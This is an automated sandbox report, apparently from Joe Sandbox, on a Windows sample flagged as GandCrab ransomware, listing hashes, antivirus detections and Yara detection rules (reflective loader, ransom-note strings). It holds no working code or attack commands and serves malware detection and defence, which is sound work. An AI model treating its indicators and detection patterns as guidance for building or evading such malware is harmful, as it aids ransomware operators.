
Windows Analysis Report
vy3mvlAaCZ.exe

Overview

General Information

Sample Name:vy3mvlAaCZ.exe
Analysis ID:694561
MD5:1873a210d41acdef243e921f3810803a
SHA1:6fa90a229148759d12c63bee342e55fa887f6976
SHA256:34c779bada9918972748153c3f618d6656148748478beec1ec57c7bb5e363593
Tags:exe
Infos:

Detection

Gandcrab, ReflectiveLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Gandcrab
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected ReflectiveLoader
Machine Learning detection for sample
Found API chain indicative of sandbox detection
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Found large amount of non-executed APIs
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)

Classification

  • System is w10x64
  • vy3mvlAaCZ.exe (PID: 4268 cmdline: "C:\Users\user\Desktop\vy3mvlAaCZ.exe" MD5: 1873A210D41ACDEF243E921F3810803A)
    • WerFault.exe (PID: 4940 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 244 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
vy3mvlAaCZ.exe | ReflectiveLoader | Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended | Florian Roth
  • 0x10bb8:$x1: ReflectiveLoader
  • 0x22a82:$x1: ReflectiveLoader
vy3mvlAaCZ.exe | SUSP_RANSOMWARE_Indicator_Jul20 | Detects ransomware indicator | Florian Roth
  • 0x22246:$: DECRYPT.txt
  • 0x22298:$: DECRYPT.txt
vy3mvlAaCZ.exe | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security
vy3mvlAaCZ.exe | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security
vy3mvlAaCZ.exe | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen
  • 0x22a81:$s1: _ReflectiveLoader@
  • 0x22a82:$s2: ReflectiveLoader@
Source | Rule | Description | Author | Strings
00000000.00000000.259577181.0000000000944000.00000008.00000001.01000000.00000003.sdmp | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security
00000000.00000000.259577181.0000000000944000.00000008.00000001.01000000.00000003.sdmp | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security
00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security
00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security
00000000.00000000.256875847.0000000000943000.00000008.00000001.01000000.00000003.sdmp | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security
Source | Rule | Description | Author | Strings
0.0.vy3mvlAaCZ.exe.944250.5.unpack | ReflectiveLoader | Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended | Florian Roth
  • 0xe832:$x1: ReflectiveLoader
0.0.vy3mvlAaCZ.exe.944250.5.unpack | SUSP_RANSOMWARE_Indicator_Jul20 | Detects ransomware indicator | Florian Roth
  • 0xdff6:$: DECRYPT.txt
  • 0xe048:$: DECRYPT.txt
0.0.vy3mvlAaCZ.exe.944250.5.unpack | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security
0.0.vy3mvlAaCZ.exe.944250.5.unpack | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security
0.0.vy3mvlAaCZ.exe.944250.5.unpack | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen
  • 0xe831:$s1: _ReflectiveLoader@
  • 0xe832:$s2: ReflectiveLoader@
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: vy3mvlAaCZ.exe | Avira: detected
Source: vy3mvlAaCZ.exe | Virustotal: Detection: 85%
Source: vy3mvlAaCZ.exe | Metadefender: Detection: 74%
Source: vy3mvlAaCZ.exe | ReversingLabs: Detection: 96%
Source: vy3mvlAaCZ.exe | Joe Sandbox ML: detected
Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack | Avira: Label: TR/Crypt.EPACK.Gen2
Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack | Avira: Label: TR/Crypt.EPACK.Gen2
Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack | Avira: Label: TR/Crypt.EPACK.Gen2
Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack | Avira: Label: TR/Crypt.EPACK.Gen2
Source: vy3mvlAaCZ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: vy3mvlAaCZ.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: vy3mvlAaCZ.exe, type: SAMPLE
Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.259577181.0000000000944000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.256875847.0000000000943000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.260275699.0000000000944000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vy3mvlAaCZ.exe PID: 4268, type: MEMORYSTR

System Summary

Source: vy3mvlAaCZ.exe, type: SAMPLE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: vy3mvlAaCZ.exe, type: SAMPLE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: vy3mvlAaCZ.exe, type: SAMPLE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: vy3mvlAaCZ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: vy3mvlAaCZ.exe, type: SAMPLE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: vy3mvlAaCZ.exe, type: SAMPLE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: vy3mvlAaCZ.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: vy3mvlAaCZ.exe, type: SAMPLE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: vy3mvlAaCZ.exe, type: SAMPLE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPE | Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPE | Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
